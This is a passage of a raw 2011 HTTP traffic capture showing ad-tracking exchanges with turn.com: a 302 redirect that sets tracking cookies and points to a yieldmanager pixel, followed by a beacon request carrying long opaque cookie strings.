7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138'; rv=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:22 GMT; Path=/
Set-Cookie: pf=qY2bpRTQ52h6k-rEhULDmf-80bcrj6GfFlLy65IAyItpZRM3I2Ow27XFAiLSy6gtZDpM35cC-2bkiEEmtUQheKDK9267-UTVtogj5UXND2su5HAnk5LdATuOawO3do3_q-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFd_4eUErznbemNQIZk1eVLKW_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUz5hB7k5XBK9McX2onxeGI5KQZVgadKvMCYCFgUrjYUKon9unhJA2-TEU2L0iqEMDVzgULCKniFrCm6MPtzExb3UlAuWh7vW5Q399kY2EvENFzGbodWQIM7eNZ6tjUQklyRTBGfXWYNvyUuhYNY6yLvEDmyQ40yuypcaj2n-9Cz63xi0zGTncnVf4kQZI0iTHB9aeSc0FuFejP7DT3fDq49_6nkAMnCskXAXCIeamqlhES2SuE6OtDGQ2imUpo49am5O8A7FIHibGj5DpgyEHdXQAR7gRvAUyzscY9lHU85mboMj7fIiLPeSUyPU1aySWaYnDFpdhfwUWntACIjyeHBjXBZnzwqmzEd4_ZfNeMUr936QamkX1LVGAV23gbEEv77QebunEAT3AyT-dC6RmTIEpBJDWUKdMYOQQtkXnJoPmGi_btX5p3IeoZ1Lxi-nN9T1I9sIGJPnzQjLyKti_2IsG6rAfmuloihjJUlNjU6wdmGgpL5a6D3XQDJY66KeNuv_TPnN_r33AUytaYxxyXHMpoBoI0SYunrxmqrb4tZx4OkdofIjRakYPCGAjMC1uxfZeycu38tuqRIWciZAR9hcyBeVzRUxv3Q7asCZPWvJx5xGZTqtRs2xUNiSflAsSFsW-QtNzsQrdzdwrcoC3tkhYHR5iu3qsnQShCayeMKXbjJNP-yTHg_EwL_p_kla7AMGYTu9kshn0fu08LSKK9Z543WaC5VrfyqqYlrPi5RsQ6MURwZQt7ZlSH1-XC3FPlwa3wVdtHBfWU9tEQhfkj8PbIMSCp0s9p46owHemHBI44M2UTaVgavrLT_knofC3_fcumHzxez4oVfLlbiK9GX-8RGzOEjKwUNFtEEw3cam9BccEarIpQ9BOHGk5MXWYGe9U8yjrMqBCSM4uyBB8RMrmjUJuzDQa3yK0ArQAWD8FK1zuDX0vUxNNi_sefehTjs-Ek8P6ZwSKypvXeo6--G3_4NUWt5VPfPBVvmwky8iGB6Mei-Co5Pi6PU2dzB8gnRv5FDc3CttxSlPaoxd9ZJg_GxCAnMbxDPMG3aVXSB74140ZvvKMWgrtC4SCWq8_23--Px6IOe43SPFoZMQY3he8jhSuSGxpVTMbu2Biq1cV7yAKOnUVIzNyIqmOosXytGMcorIx_eIHOw0mNEsEgJ9zvTW4UrXpnwZNR-dqAY9pAGZqVnwMgUsxj_J0U7rwX210jST5FOXamjm2E-eqDPrvqF7LxDYaWnK7yCzjJLEFsF_1gXQup4U2Z6iIaIceMbHzJdW4zaFWhi71EUOeSjfUSmohzpuSGtzPqET1ZwRqBA8faKAQ8ScuOhMxEgEEI-yCPEW6KDWJBVVqZ8RdE-GQirFt1fEONFpzomfU21XKlAFv742XXZIRhFNLL5BYaXb7zu1RSwq44rxRRvOysat_jFzzvTdA-ZjkNz7sBx5YjZBW0EhdEV_TwZIxDUW70r3e7pJ1-TR-F1sI6I_9ogEE1ieHXSHT8YJ9V9XuPMns4IUIyHL2xmfESdWxUsROq8UchygSq_Hdv08JgwEWi3lpcWok_cX2Cb50T3nJSujWmflunVVIvfDAAZ_ic1bpn2n6j0KAXr-F8h_otiKTDPHaFztEy4xEzRWZfSIjat-l3Iho5BzQjTd0nmGLD04qoX36F6GBGzTTi7rcg0HsUWz6PDbTG7ngrGqQRjkryS5N8GaeeZ5eoGkWq419T6v1raQyKtoRMygKwCKIQFsUa_kASFigZxBB3r_OQJyN2Rdm1GZDRZhWzy5r1zk7OEZzQhopVJMY2oZQ5dToHjubH_pZG3Lc5UHogasT9J2-8NhDSYfLvAdPkIwo8toVtcbEjAzTK86Gkcc8x5A2gv_y2YD3emUpAWd6wbsL2X3RCtIB-q7ZC5UbEPgbUDzwx9stVoQNj6Ijg2os19R4J_09QinFBdxdZ4uJ8Wx6iVLHvsxfIUeeirrXIriUvrBbeReuu1H5jiFRTCwXRtr987sbNkvliLbNUlo-UU5UJ69hMOu; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:22 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:22 GMT

Request 2

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3p